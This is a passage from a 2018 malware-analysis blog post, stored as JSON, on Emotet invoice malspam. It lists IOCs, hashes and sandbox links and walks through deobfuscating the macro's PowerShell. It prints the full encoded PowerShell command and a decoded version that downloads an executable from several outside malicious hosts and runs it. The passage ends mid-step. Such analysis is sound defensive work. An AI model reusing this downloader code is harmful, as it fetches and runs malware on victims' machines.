{"id":1129,"date":"2018-05-30T03:26:46","date_gmt":"2018-05-30T02:26:46","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=1129"},"modified":"2018-05-30T04:17:33","modified_gmt":"2018-05-30T03:17:33","slug":"2018-05-29-more-emotet-malspam","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=1129","title":{"rendered":"2018-05-29 More Emotet Malspam"},"content":{"rendered":"<p>Quick post for today. Looks like some more Emotet maldocs. As usual, these two dealt with an invoice of some sort. While the sender is not the same in both instances, and the hash of the attachments are different as well, they both end up using the same URLs to download the malicious binary.<\/p>\n<p>For the artifacts, please see my Github repo for this <a href=\"http:\/\/github.com\/bloomer1016\/2018-05-29-Emotet-Malspam\" rel=\"noopener\" target=\"_blank\">here<\/a>.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/05\/email.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/05\/email.png\" alt=\"\" width=\"1276\" height=\"597\" class=\"aligncenter size-full wp-image-1130\" \/><\/a><\/p>\n<p>IOCs:<br \/>\n=====<br \/>\n150.95.224.218 \/ fotofolly[.]com (HTTPS)<br \/>\n177.185.192.135 \/ maisbrasilphoto[.]com.br (GET \/yWEiMr\/)<br \/>\n74.139.102[.]161 (HTTPS)<\/p>\n<p>Artifacts:<br \/>\n==========<br \/>\nFile name: Payroll[1].doc<br \/>\nFile size: 120K<br \/>\nFile path: NA<br \/>\nMD5 hash: 9166fbf7ad1ab5c1a5e23aa985f20d98<br \/>\nVirustotal: <a href=\"http:\/\/www.virustotal.com\/#\/file\/4042cf05a1f96d50cae7d92bb912250ca2ef91b205a119e111ce7065e3ebde13\/detection\" rel=\"noopener\" target=\"_blank\">http:\/\/www.virustotal.com\/#\/file\/4042cf05a1f96d50cae7d92bb912250ca2ef91b205a119e111ce7065e3ebde13\/detection<\/a><br \/>\nDetection ratio: 26 \/ 58<br \/>\nFirst Detected: 2018-05-29 09:02:48<br \/>\nAny.Run: <a href=\"http:\/\/app.any.run\/tasks\/25a9d87c-bd53-4d10-97e2-2b89482e9c52\" rel=\"noopener\" target=\"_blank\">http:\/\/app.any.run\/tasks\/25a9d87c-bd53-4d10-97e2-2b89482e9c52<\/a><\/p>\n<p>File name: Payroll[1].doc<br \/>\nFile size: 120K<br \/>\nFile path: NA<br \/>\nMD5 hash: 296f8b9ac8de01683f53d86ce0be563e<br \/>\nVirustotal: <a href=\"http:\/\/www.virustotal.com\/#\/file\/bc9f03ae72b74ea0e758203d4916bc5c921ea0a8a65c66ad4ab5654e374e9ee0\/detection\" rel=\"noopener\" target=\"_blank\">http:\/\/www.virustotal.com\/#\/file\/bc9f03ae72b74ea0e758203d4916bc5c921ea0a8a65c66ad4ab5654e374e9ee0\/detection<\/a><br \/>\nDetection ratio: 13 \/ 59<br \/>\nFirst Detected: 2018-05-29 06:31:37<\/p>\n<p>File name: 86165.exe \\ markerswwa.exe<br \/>\nFile size: 208K<br \/>\nFile path: C:\\Users\\Public\\ AND C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Windows<br \/>\nMD5 hash: b5d50d4f0455111c4e3ae693788a2bb0<br \/>\nVirustotal: <a href=\"http:\/\/www.virustotal.com\/#\/file\/773c497bc2be46804bdb239808272026bd820d7cc08b244f8815e39229f81cbd\/detection\" rel=\"noopener\" target=\"_blank\">http:\/\/www.virustotal.com\/#\/file\/773c497bc2be46804bdb239808272026bd820d7cc08b244f8815e39229f81cbd\/detection<\/a><br \/>\nDetection ratio: 27 \/ 66<br \/>\nFirst Detected: 2018-05-29 13:52:25<br \/>\nHybrid Analysis: <a href=\"http:\/\/www.hybrid-analysis.com\/sample\/773c497bc2be46804bdb239808272026bd820d7cc08b244f8815e39229f81cbd?environmentId=100\" rel=\"noopener\" target=\"_blank\">http:\/\/www.hybrid-analysis.com\/sample\/773c497bc2be46804bdb239808272026bd820d7cc08b244f8815e39229f81cbd?environmentId=100<\/a><br \/>\nAny.Run: <a href=\"http:\/\/app.any.run\/tasks\/16b7e311-f213-4866-a421-3a5f5f57e60e\" rel=\"noopener\" target=\"_blank\">http:\/\/app.any.run\/tasks\/16b7e311-f213-4866-a421-3a5f5f57e60e<\/a><\/p>\n<p>Analysis:<br \/>\n=========<br \/>\nNothing really special about these maldocs. They are using macros within a Word document to launch the malicious code. As seen below, the process tree from ProcMon is pretty straight forward.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/05\/ProcMon-Tree.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/05\/ProcMon-Tree.png\" alt=\"\" width=\"1040\" height=\"89\" class=\"aligncenter size-full wp-image-1132\" \/><\/a><\/p>\n<p>Once the macro is run, Powershell is immediately started with the following command:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nPowersHeLL -WinDowsTyle hidden -e IAAmACgAIAAkAFMASABFAGwAbABpAGQAWwAxAF0AKwAkAHMAaABlAGwATABJAGQAWwAxADMAXQArACcAeAAnACkAKAAoACgAIgB7ADEANAAwAH0AewA4ADAAfQB7ADEAMwAzAH0AewA0ADQAfQB7ADEAMgA4AH0AewA0ADUAfQB7ADgAMQB9AHsANwA0AH0AewAxADIANQB9AHsAMwA4AH0AewAxADEAfQB7ADAAfQB7ADYAMwB9AHsAMQA4AH0AewAxADkAfQB7ADEAMwAwAH0AewAxADMANAB9AHsAMQAwADkAfQB7ADEAMQA2AH0AewA0ADEAfQB7ADYAMQB9AHsAMQA1AH0AewA1ADkAfQB7ADkAfQB7ADEAMQAwAH0AewAyADEAfQB7ADEAMQA4AH0AewA1ADIAfQB7ADUAOAB9AHsAMQA3AH0AewA3ADYAfQB7ADQAfQB7ADcANwB9AHsAMQA0AH0AewA0ADYAfQB7ADIANwB9AHsAMQAxADkAfQB7ADcAOAB9AHsAMQAzADYAfQB7ADEAMgAxAH0AewA1ADYAfQB7ADYAOAB9AHsAOQA0AH0AewA3AH0AewAxADEAMgB9AHsAMQAyAH0AewAzADIAfQB7ADMANQB9AHsAMQAxADQAfQB7ADEAfQB7ADQAOQB9AHsAMQAwADgAfQB7ADQANwB9AHsANAAyAH0AewAxADAAMwB9AHsANgAyAH0AewAzADcAfQB7ADEAMgA2AH0AewAxADAANwB9AHsAMQA0ADMAfQB7ADEAMAAyAH0AewA4ADgAfQB7ADUAMAB9AHsAMwAwAH0AewAzADEAfQB7ADUAfQB7ADIANAB9AHsAOQAxAH0AewAxADMAOAB9AHsAMQA2AH0AewA3ADkAfQB7ADYANgB9AHsAMQAyADkAfQB7ADcAMwB9AHsANwA1AH0AewA3ADAAfQB7ADEAMAAxAH0AewAyADIAfQB7ADEAMAA2AH0AewAxADEAMwB9AHsAMQAzAH0AewA1ADcAfQB7ADQAOAB9AHsAMQAzADkAfQB7ADQAMAB9AHsAMQAzADEAfQB7ADIAMwB9AHsAMQA0ADEAfQB7ADEAMQA3AH0AewA5ADAAfQB7ADgAMwB9AHsAMQA0ADIAfQB7ADYAOQB9AHsAMQAwAH0AewAyADgAfQB7ADEAMwA1AH0AewA5ADcAfQB7ADQAMwB9AHsAMwA5AH0AewAxADIAMwB9AHsAMQAyADcAfQB7ADMANAB9AHsANQAzAH0AewA4ADYAfQB7ADMAfQB7ADkANQB9AHsAMQAzADcAfQB7ADYANQB9AHsAOQA5AH0AewA4AH0AewAyAH0AewAzADYAfQB7ADUAMQB9AHsAOAAyAH0AewA2AH0AewA4ADQAfQB7ADMAMwB9AHsAMgA5AH0AewA1ADUAfQB7ADEAMQAxAH0AewA5ADYAfQB7ADEAMAA1AH0AewA4ADkAfQB7ADgANwB9AHsANgAwAH0AewAxADAAMAB9AHsAMQAyADIAfQB7ADEAMAA0AH0AewAxADIAMAB9AHsAOAA1AH0AewAyADUAfQB7ADcAMgB9AHsAMQAxADUAfQB7ADYANwB9AHsAMQAyADQAfQB7ADkAMwB9AHsAOQA4AH0AewAyADAAfQB7ADcAMQB9AHsAMQAzADIAfQB7ADkAMgB9AHsANQA0AH0AewA2ADQAfQB7ADIANgB9ACIAIAAtAGYAJwBjAHQAZQBqAGMAJwAsACcAYgAnACwAJwBvAFYAJwAsACcAagBjACkAOwBmACcALAAnAGEAZABhAHMAZAAuAG4AJwAsACcALwAnACwAJwBpAFoATwBhAGQARgAnACwAJwB0ACcALAAnAC4AdQBGAEQARAAnACwAJwBjACkAIABTAHkAcwB0AGUAbQAuACcALAAnAG8ASABlAGoAYwAgACsAIABYACcALAAnAGUAagBjACsAZQBqACcALAAnAC4AYwBvAG0AJwAsACcAUwA5ADYAQQAvAGUAagBjAC4AUwAnACwAJwAgADIAJwAsACcAZQBqAGMALQBvAGIAagBlACcALAAnAGgALQB6ACcALAAnACAAPQAgACcALAAnADsAWABPAGEAWQBZAFUAIAA9ACcALAAnACAALgAnACwAJwBlAGoAYwApACgAWABPAGEAUwBEACcALAAnAEMAbAAnACwAJwAuAGkAbgAnACwAJwBqAGMAKQA7AFgATwBhAFMARAAnACwAJwBAAGgAdAB0AHAAJwAsACcAbwBlAGoAJwAsACcAYwBoAHsAfQB9ACcALAAnAFgATwAnACwAJwBPACcALAAnAFgATwAnACwAJwBjAG8AbQAvAHUAMAByACcALAAnAFEAJwAsACcALwBxAGQATQAyAC8AJwAsACcAKAAnACwAJwB4ACcALAAnAEAAaAAnACwAJwBpACcALAAnAGgAdAAnACwAJwBjACcALAAnAGoAJwAsACcAYwBAACcALAAnAGoAYwB3AGUAagAnACwAJwBtAC4AYgByACcALAAnACAAKwAgACgAZQAnACwAJwAgACYAKABlAGoAYwBuAGUAJwAsACcAKwAnACwAJwA4ADIAMQAzADMAKQA7ACcALAAnAHAAaABvAHQAbwAuAGMAbwAnACwAJwBpAHQAKABlACcALAAnAHIAYQAnACwAJwAuACcALAAnAFoAVwBuACcALAAnAGUAbgB0ADsAJwAsACcAZQBqAGMAJwAsACcAOwB9AGMAYQAnACwAJwBhAGEAcwBmAGMAJwAsACcAcABzACcALAAnAHAAbAAnACwAJwBYAE8AYQBOAFMAQgAnACwAJwBjAHQAZQBqACcALAAnACwAIABYACcALAAnAGMAKwAnACwAJwBFAGkATQByAC8AQAAnACwAJwApACAAcgBhAG4AZABvAG0AJwAsACcAdAAnACwAJwBmAGMAIABpAG4AIABYAE8AJwAsACcAbgBlACcALAAnAGsAZQBqACcALAAnADoAJwAsACcAZQBqAGMAMQAnACwAJwB0AHQAcAA6AC8ALwAnACwAJwBDACkAOwBiACcALAAnAGMAKwBlAGoAJwAsACcAVQBuAGsAZgAzADgALwBAACcALAAnAGoAYwBlAGUAagBjACsAZQBqAGMAdwAtAG8AYgBqACcALAAnAGgAJwAsACcAWABPAGEAbgBzACcALAAnAGUAeAB0ACgAMQAwADAAMAAwACwAJwAsACcAWAAnACwAJwBvACcALAAnAG4AcwAnACwAJwBlACcALAAnAGwAVgAnACwAJwB1AGIAbAAnACwAJwBJAFYAaQBaAGwAZQB1AEYARAAnACwAJwB2ACcALAAnACsAZQBqAGMAZQBlACcALAAnAEQAKAApACcALAAnAGQAaQBlAHYAbwBpAGcAdABzACcALAAnAGcAdQBGACcALAAnAHAAJwAsACcAOgAvACcALAAnAGEAawAnACwAJwBjAGUALQBJAHQAZQAnACwAJwAvAC8AZgBvACcALAAnAG8AcgBlAGEAYwBoACgAJwAsACcAbwBTAHQAcgBWAGkAWgAnACwAJwBOAFMAQgAnACwAJwBtACcALAAnAGEAQQBEAEMAWAApAHsAdAByAHkAewBYAE8AYQBZAFkAVQAnACwAJwBPAGEAUwBEAEMAKQAnACwAJwBtAGEAcgBlAGsAJwAsACcALwAnACwAJwAvAHkAVwAnACwAJwAmACgAJwAsACcAaQBWAGkAWgBOACcALAAnAC8AcwAnACwAJwBwACcALAAnAHMAaQBsACcALAAnAGUAagBjACsAJwAsACcATgBlAHQALgBXAGUAYgAnACwAJwAuAHUARgBEAFQAJwAsACcAbwBmAG8AbABsAHkAJwAsACcAYQAnACwAJwB0AHQAcAA6AC8ALwBtAGEAaQBzACcALAAnAGMAJwAsACcAZQAnACwAJwBhAGUAbgB2ADoAJwAsACcAaQAnACwAJwBhAEEARABDACcALAAnAGUAagBjAEkAbgAnACwAJwBjAA0ACgBoAHQAdAAnACwAJwA7ACcALAAnAGMAJwAsACcAYwArAGUAagAnACwAJwBlACcALAAnAHQAJwAsACcALgBlACcALAAnAGoAYwAnACwAJwAuAG4AZQB0AC8AUwAnACwAJwAoAGUAagAnACwAJwBlACcALAAnAHIAZQAnACwAJwBhAGQAYQBzAGQAIAA9ACcALAAnAGMAbgBlACcALAAnAGEAJwAsACcAIAA9ACAAZQBqACcALAAnAFgATwBhAGEAcwAnACwAJwAvAGcAJwAsACcAagAnACwAJwBYAE8AYQAnACwAJwBDACAAPQAgAFgATwAnACwAJwBpAGMAIAArACAAJwAsACcAOgAvACcAKQApAC4AcgBFAHAAbABBAEMAZQAoACgAWwBDAEgAYQBSAF0AMQAxADcAKwBbAEMASABhAFIAXQA3ADAAKwBbAEMASABhAFIAXQA2ADgAKQAsAFsAUwBUAHIAaQBuAEcAXQBbAEMASABhAFIAXQAzADQAKQAuAHIARQBwAGwAQQBDAGUAKAAnAFgATwBhACcALABbAFMAVAByAGkAbgBHAF0AWwBDAEgAYQBSAF0AMwA2ACkALgByAEUAcABsAEEAQwBlACgAKABbAEMASABhAFIAXQAxADAAMQArAFsAQwBIAGEAUgBdADEAMAA2ACsAWwBDAEgAYQBSAF0AOQA5ACkALABbAFMAVAByAGkAbgBHAF0AWwBDAEgAYQBSAF0AMwA5ACkALgByAEUAcABsAEEAQwBlACgAKABbAEMASABhAFIAXQA0ADkAKwBbAEMASABhAFIAXQAxADEAMQArAFsAQwBIAGEAUgBdADcAMgApACwAWwBTAFQAcgBpAG4ARwBdAFsAQwBIAGEAUgBdADkAMgApAC4AcgBFAHAAbABBAEMAZQAoACgAWwBDAEgAYQBSAF0AOAA2ACsAWwBDAEgAYQBSAF0AMQAwADUAKwBbAEMASABhAFIAXQA5ADAAKQAsAFsAUwBUAHIAaQBuAEcAXQBbAEMASABhAFIAXQA5ADYAKQAgACkAIAA=<\/pre>\n<p>which cleaned up decodes to this:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nPowersHeLL -WinDowsTyle hidden -e &amp; iex \r\n$nsadasd = &amp;(new-object) random;\r\n$YYU = .(new-object) System.Net.WebClient;\r\n$NSB = $nsadasd.next(10000, 282133);\r\n$ADCX = http:\/\/fotofolly&#x5B;.]com\/qdM2\/@http:\/\/maisbrasilphoto&#x5B;.]com.br\/yWEiMr\/@http:\/\/dievoigts&#x5B;.]com\/u0rQ\/@http:\/\/gh-zone&#x5B;.]net\/SUnkf38\/@http:\/\/marek&#x5B;.]in\/saS96A\/.Split(@);\r\n$SDC = $env:public  \\  $NSB  (.exe);\r\n\tforeach($asfc in $ADCX){\r\n\t\ttry{$YYU.DoWnlOadFIle($asfc.ToStriNg(), $SDC);\r\n\t\t&amp;(Invoke-Item)($SDC);\r\n\t\tbreak;}\r\ncatch{}}<\/pre>\n<p>*NOTE:* I managed to do this by referencing an old trick that I documented in this <a href=\"http:\/\/www.herbiez.com\/?p=938\" rel=\"noopener\" target=\"_blank\">blog post<\/a>. I will walk through how I did it here as well (to save you a click).<\/p>\n<p>So the above Powershell command starts off with &#8220;something&#8221; base64 encoded as denoted by the &#8220;-e&#8221; which is one of many ways of writing that command. The trick here is to run this through Powershell and have it do the heavy lifting for you (aka: deobfuscating it). With that being said, first I took the base64 encoding and converted it using CyberChef as seen <a href=\"http:\/\/gchq.github.io\/CyberChef\/#recipe=From_Base64('A-Za-z0-9%2B\/%3D',true)Remove_null_bytes()&amp;input=SUFBbUFDZ0FJQUFrQUZNQVNBQkZBR3dBYkFCcEFHUUFXd0F4QUYwQUt3QWtBSE1BYUFCbEFHd0FUQUJKQUdRQVd3QXhBRE1BWFFBckFDY0FlQUFuQUNrQUtBQW9BQ2dBSWdCN0FERUFOQUF3QUgwQWV3QTRBREFBZlFCN0FERUFNd0F6QUgwQWV3QTBBRFFBZlFCN0FERUFNZ0E0QUgwQWV3QTBBRFVBZlFCN0FEZ0FNUUI5QUhzQU53QTBBSDBBZXdBeEFESUFOUUI5QUhzQU13QTRBSDBBZXdBeEFERUFmUUI3QURBQWZRQjdBRFlBTXdCOUFIc0FNUUE0QUgwQWV3QXhBRGtBZlFCN0FERUFNd0F3QUgwQWV3QXhBRE1BTkFCOUFIc0FNUUF3QURrQWZRQjdBREVBTVFBMkFIMEFld0EwQURFQWZRQjdBRFlBTVFCOUFIc0FNUUExQUgwQWV3QTFBRGtBZlFCN0FEa0FmUUI3QURFQU1RQXdBSDBBZXdBeUFERUFmUUI3QURFQU1RQTRBSDBBZXdBMUFESUFmUUI3QURVQU9BQjlBSHNBTVFBM0FIMEFld0EzQURZQWZRQjdBRFFBZlFCN0FEY0FOd0I5QUhzQU1RQTBBSDBBZXdBMEFEWUFmUUI3QURJQU53QjlBSHNBTVFBeEFEa0FmUUI3QURjQU9BQjlBSHNBTVFBekFEWUFmUUI3QURFQU1nQXhBSDBBZXdBMUFEWUFmUUI3QURZQU9BQjlBSHNBT1FBMEFIMEFld0EzQUgwQWV3QXhBREVBTWdCOUFIc0FNUUF5QUgwQWV3QXpBRElBZlFCN0FETUFOUUI5QUhzQU1RQXhBRFFBZlFCN0FERUFmUUI3QURRQU9RQjlBSHNBTVFBd0FEZ0FmUUI3QURRQU53QjlBSHNBTkFBeUFIMEFld0F4QURBQU13QjlBSHNBTmdBeUFIMEFld0F6QURjQWZRQjdBREVBTWdBMkFIMEFld0F4QURBQU53QjlBSHNBTVFBMEFETUFmUUI3QURFQU1BQXlBSDBBZXdBNEFEZ0FmUUI3QURVQU1BQjlBSHNBTXdBd0FIMEFld0F6QURFQWZRQjdBRFVBZlFCN0FESUFOQUI5QUhzQU9RQXhBSDBBZXdBeEFETUFPQUI5QUhzQU1RQTJBSDBBZXdBM0FEa0FmUUI3QURZQU5nQjlBSHNBTVFBeUFEa0FmUUI3QURjQU13QjlBSHNBTndBMUFIMEFld0EzQURBQWZRQjdBREVBTUFBeEFIMEFld0F5QURJQWZRQjdBREVBTUFBMkFIMEFld0F4QURFQU13QjlBSHNBTVFBekFIMEFld0ExQURjQWZRQjdBRFFBT0FCOUFIc0FNUUF6QURrQWZRQjdBRFFBTUFCOUFIc0FNUUF6QURFQWZRQjdBRElBTXdCOUFIc0FNUUEwQURFQWZRQjdBREVBTVFBM0FIMEFld0E1QURBQWZRQjdBRGdBTXdCOUFIc0FNUUEwQURJQWZRQjdBRFlBT1FCOUFIc0FNUUF3QUgwQWV3QXlBRGdBZlFCN0FERUFNd0ExQUgwQWV3QTVBRGNBZlFCN0FEUUFNd0I5QUhzQU13QTVBSDBBZXdBeEFESUFNd0I5QUhzQU1RQXlBRGNBZlFCN0FETUFOQUI5QUhzQU5RQXpBSDBBZXdBNEFEWUFmUUI3QURNQWZRQjdBRGtBTlFCOUFIc0FNUUF6QURjQWZRQjdBRFlBTlFCOUFIc0FPUUE1QUgwQWV3QTRBSDBBZXdBeUFIMEFld0F6QURZQWZRQjdBRFVBTVFCOUFIc0FPQUF5QUgwQWV3QTJBSDBBZXdBNEFEUUFmUUI3QURNQU13QjlBSHNBTWdBNUFIMEFld0ExQURVQWZRQjdBREVBTVFBeEFIMEFld0E1QURZQWZRQjdBREVBTUFBMUFIMEFld0E0QURrQWZRQjdBRGdBTndCOUFIc0FOZ0F3QUgwQWV3QXhBREFBTUFCOUFIc0FNUUF5QURJQWZRQjdBREVBTUFBMEFIMEFld0F4QURJQU1BQjlBSHNBT0FBMUFIMEFld0F5QURVQWZRQjdBRGNBTWdCOUFIc0FNUUF4QURVQWZRQjdBRFlBTndCOUFIc0FNUUF5QURRQWZRQjdBRGtBTXdCOUFIc0FPUUE0QUgwQWV3QXlBREFBZlFCN0FEY0FNUUI5QUhzQU1RQXpBRElBZlFCN0FEa0FNZ0I5QUhzQU5RQTBBSDBBZXdBMkFEUUFmUUI3QURJQU5nQjlBQ0lBSUFBdEFHWUFKd0JqQUhRQVpRQnFBR01BSndBc0FDY0FZZ0FuQUN3QUp3QnZBRllBSndBc0FDY0FhZ0JqQUNrQU93Qm1BQ2NBTEFBbkFHRUFaQUJoQUhNQVpBQXVBRzRBSndBc0FDY0FMd0FuQUN3QUp3QnBBRm9BVHdCaEFHUUFSZ0FuQUN3QUp3QjBBQ2NBTEFBbkFDNEFkUUJHQUVRQVJBQW5BQ3dBSndCakFDa0FJQUJUQUhrQWN3QjBBR1VBYlFBdUFDY0FMQUFuQUc4QVNBQmxBR29BWXdBZ0FDc0FJQUJZQUNjQUxBQW5BR1VBYWdCakFDc0FaUUJxQUNjQUxBQW5BQzRBWXdCdkFHMEFKd0FzQUNjQVV3QTVBRFlBUVFBdkFHVUFhZ0JqQUM0QVV3QW5BQ3dBSndBZ0FESUFKd0FzQUNjQVpRQnFBR01BTFFCdkFHSUFhZ0JsQUNjQUxBQW5BR2dBTFFCNkFDY0FMQUFuQUNBQVBRQWdBQ2NBTEFBbkFEc0FXQUJQQUdFQVdRQlpBRlVBSUFBOUFDY0FMQUFuQUNBQUxnQW5BQ3dBSndCbEFHb0FZd0FwQUNnQVdBQlBBR0VBVXdCRUFDY0FMQUFuQUVNQWJBQW5BQ3dBSndBdUFHa0FiZ0FuQUN3QUp3QnFBR01BS1FBN0FGZ0FUd0JoQUZNQVJBQW5BQ3dBSndCQUFHZ0FkQUIwQUhBQUp3QXNBQ2NBYndCbEFHb0FKd0FzQUNjQVl3Qm9BSHNBZlFCOUFDY0FMQUFuQUZnQVR3QW5BQ3dBSndCUEFDY0FMQUFuQUZnQVR3QW5BQ3dBSndCakFHOEFiUUF2QUhVQU1BQnlBQ2NBTEFBbkFGRUFKd0FzQUNjQUx3QnhBR1FBVFFBeUFDOEFKd0FzQUNjQUtBQW5BQ3dBSndCNEFDY0FMQUFuQUVBQWFBQW5BQ3dBSndCcEFDY0FMQUFuQUdnQWRBQW5BQ3dBSndCakFDY0FMQUFuQUdvQUp3QXNBQ2NBWXdCQUFDY0FMQUFuQUdvQVl3QjNBR1VBYWdBbkFDd0FKd0J0QUM0QVlnQnlBQ2NBTEFBbkFDQUFLd0FnQUNnQVpRQW5BQ3dBSndBZ0FDWUFLQUJsQUdvQVl3QnVBR1VBSndBc0FDY0FLd0FuQUN3QUp3QTRBRElBTVFBekFETUFLUUE3QUNjQUxBQW5BSEFBYUFCdkFIUUFid0F1QUdNQWJ3QW5BQ3dBSndCcEFIUUFLQUJsQUNjQUxBQW5BSElBWVFBbkFDd0FKd0F1QUNjQUxBQW5BRm9BVndCdUFDY0FMQUFuQUdVQWJnQjBBRHNBSndBc0FDY0FaUUJxQUdNQUp3QXNBQ2NBT3dCOUFHTUFZUUFuQUN3QUp3QmhBR0VBY3dCbUFHTUFKd0FzQUNjQWNBQnpBQ2NBTEFBbkFIQUFiQUFuQUN3QUp3QllBRThBWVFCT0FGTUFRZ0FuQUN3QUp3QmpBSFFBWlFCcUFDY0FMQUFuQUN3QUlBQllBQ2NBTEFBbkFHTUFLd0FuQUN3QUp3QkZBR2tBVFFCeUFDOEFRQUFuQUN3QUp3QXBBQ0FBY2dCaEFHNEFaQUJ2QUcwQUp3QXNBQ2NBZEFBbkFDd0FKd0JtQUdNQUlBQnBBRzRBSUFCWUFFOEFKd0FzQUNjQWJnQmxBQ2NBTEFBbkFHc0FaUUJxQUNjQUxBQW5BRG9BSndBc0FDY0FaUUJxQUdNQU1RQW5BQ3dBSndCMEFIUUFjQUE2QUM4QUx3QW5BQ3dBSndCREFDa0FPd0JpQUNjQUxBQW5BR01BS3dCbEFHb0FKd0FzQUNjQVZRQnVBR3NBWmdBekFEZ0FMd0JBQUNjQUxBQW5BR29BWXdCbEFHVUFhZ0JqQUNzQVpRQnFBR01BZHdBdEFHOEFZZ0JxQUNjQUxBQW5BR2dBSndBc0FDY0FXQUJQQUdFQWJnQnpBQ2NBTEFBbkFHVUFlQUIwQUNnQU1RQXdBREFBTUFBd0FDd0FKd0FzQUNjQVdBQW5BQ3dBSndCdkFDY0FMQUFuQUc0QWN3QW5BQ3dBSndCbEFDY0FMQUFuQUd3QVZnQW5BQ3dBSndCMUFHSUFiQUFuQUN3QUp3QkpBRllBYVFCYUFHd0FaUUIxQUVZQVJBQW5BQ3dBSndCMkFDY0FMQUFuQUNzQVpRQnFBR01BWlFCbEFDY0FMQUFuQUVRQUtBQXBBQ2NBTEFBbkFHUUFhUUJsQUhZQWJ3QnBBR2NBZEFCekFDY0FMQUFuQUdjQWRRQkdBQ2NBTEFBbkFIQUFKd0FzQUNjQU9nQXZBQ2NBTEFBbkFHRUFhd0FuQUN3QUp3QmpBR1VBTFFCSkFIUUFaUUFuQUN3QUp3QXZBQzhBWmdCdkFDY0FMQUFuQUc4QWNnQmxBR0VBWXdCb0FDZ0FKd0FzQUNjQWJ3QlRBSFFBY2dCV0FHa0FXZ0FuQUN3QUp3Qk9BRk1BUWdBbkFDd0FKd0J0QUNjQUxBQW5BR0VBUVFCRUFFTUFXQUFwQUhzQWRBQnlBSGtBZXdCWUFFOEFZUUJaQUZrQVZRQW5BQ3dBSndCUEFHRUFVd0JFQUVNQUtRQW5BQ3dBSndCdEFHRUFjZ0JsQUdzQUp3QXNBQ2NBTHdBbkFDd0FKd0F2QUhrQVZ3QW5BQ3dBSndBbUFDZ0FKd0FzQUNjQWFRQldBR2tBV2dCT0FDY0FMQUFuQUM4QWN3QW5BQ3dBSndCd0FDY0FMQUFuQUhNQWFRQnNBQ2NBTEFBbkFHVUFhZ0JqQUNzQUp3QXNBQ2NBVGdCbEFIUUFMZ0JYQUdVQVlnQW5BQ3dBSndBdUFIVUFSZ0JFQUZRQUp3QXNBQ2NBYndCbUFHOEFiQUJzQUhrQUp3QXNBQ2NBWVFBbkFDd0FKd0IwQUhRQWNBQTZBQzhBTHdCdEFHRUFhUUJ6QUNjQUxBQW5BR01BSndBc0FDY0FaUUFuQUN3QUp3QmhBR1VBYmdCMkFEb0FKd0FzQUNjQWFRQW5BQ3dBSndCaEFFRUFSQUJEQUNjQUxBQW5BR1VBYWdCakFFa0FiZ0FuQUN3QUp3QmpBQTBBQ2dCb0FIUUFkQUFuQUN3QUp3QTdBQ2NBTEFBbkFHTUFKd0FzQUNjQVl3QXJBR1VBYWdBbkFDd0FKd0JsQUNjQUxBQW5BSFFBSndBc0FDY0FMZ0JsQUNjQUxBQW5BR29BWXdBbkFDd0FKd0F1QUc0QVpRQjBBQzhBVXdBbkFDd0FKd0FvQUdVQWFnQW5BQ3dBSndCbEFDY0FMQUFuQUhJQVpRQW5BQ3dBSndCaEFHUUFZUUJ6QUdRQUlBQTlBQ2NBTEFBbkFHTUFiZ0JsQUNjQUxBQW5BR0VBSndBc0FDY0FJQUE5QUNBQVpRQnFBQ2NBTEFBbkFGZ0FUd0JoQUdFQWN3QW5BQ3dBSndBdkFHY0FKd0FzQUNjQWFnQW5BQ3dBSndCWUFFOEFZUUFuQUN3QUp3QkRBQ0FBUFFBZ0FGZ0FUd0FuQUN3QUp3QnBBR01BSUFBckFDQUFKd0FzQUNjQU9nQXZBQ2NBS1FBcEFDNEFjZ0JGQUhBQWJBQkJBRU1BWlFBb0FDZ0FXd0JEQUVnQVlRQlNBRjBBTVFBeEFEY0FLd0JiQUVNQVNBQmhBRklBWFFBM0FEQUFLd0JiQUVNQVNBQmhBRklBWFFBMkFEZ0FLUUFzQUZzQVV3QlVBSElBYVFCdUFFY0FYUUJiQUVNQVNBQmhBRklBWFFBekFEUUFLUUF1QUhJQVJRQndBR3dBUVFCREFHVUFLQUFuQUZnQVR3QmhBQ2NBTEFCYkFGTUFWQUJ5QUdrQWJnQkhBRjBBV3dCREFFZ0FZUUJTQUYwQU13QTJBQ2tBTGdCeUFFVUFjQUJzQUVFQVF3QmxBQ2dBS0FCYkFFTUFTQUJoQUZJQVhRQXhBREFBTVFBckFGc0FRd0JJQUdFQVVnQmRBREVBTUFBMkFDc0FXd0JEQUVnQVlRQlNBRjBBT1FBNUFDa0FMQUJiQUZNQVZBQnlBR2tBYmdCSEFGMEFXd0JEQUVnQVlRQlNBRjBBTXdBNUFDa0FMZ0J5QUVVQWNBQnNBRUVBUXdCbEFDZ0FLQUJiQUVNQVNBQmhBRklBWFFBMEFEa0FLd0JiQUVNQVNBQmhBRklBWFFBeEFERUFNUUFyQUZzQVF3QklBR0VBVWdCZEFEY0FNZ0FwQUN3QVd3QlRBRlFBY2dCcEFHNEFSd0JkQUZzQVF3QklBR0VBVWdCZEFEa0FNZ0FwQUM0QWNnQkZBSEFBYkFCQkFFTUFaUUFvQUNnQVd3QkRBRWdBWVFCU0FGMEFPQUEyQUNzQVd3QkRBRWdBWVFCU0FGMEFNUUF3QURVQUt3QmJBRU1BU0FCaEFGSUFYUUE1QURBQUtRQXNBRnNBVXdCVUFISUFhUUJ1QUVjQVhRQmJBRU1BU0FCaEFGSUFYUUE1QURZQUtRQWdBQ2tBSUFBPQ\" rel=\"noopener\" target=\"_blank\">here<\/a>. Once I had decoded it to somewhat human-readable text, I copied the output, opened Powershell ISE on my VM and pasted the output using the &#8220;write-host&#8221; command-let:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nWrite-Host &quot;&amp;&quot;( 